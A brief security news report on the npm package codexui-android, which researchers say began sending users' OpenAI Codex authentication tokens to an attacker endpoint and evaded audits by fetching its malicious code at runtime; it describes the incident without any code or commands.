A popular npm package, codexui-android, secretly exfiltrated OpenAI Codex authentication tokens, researchers report. According to Aikido Security researcher Charlie Eriksen, the package amassed about 27,000 weekly downloads and, starting roughly a month after publication, every invocation began sending the contents of users’ auth.json (Codex auth tokens) to an attacker-controlled endpoint, reportedly sentry.anyclaw.store (per Aikido blog). Cybernews reports the package delivered genuine functionality and that the malicious code was pulled at runtime rather than present in the GitHub repository, which allowed it to evade source audits and, Cybernews adds, to bypass Google Play pre-publication scans. The incident illustrates a supply-chain technique where threat actors weaponize legitimate developer tools, according to the published researcher findings.
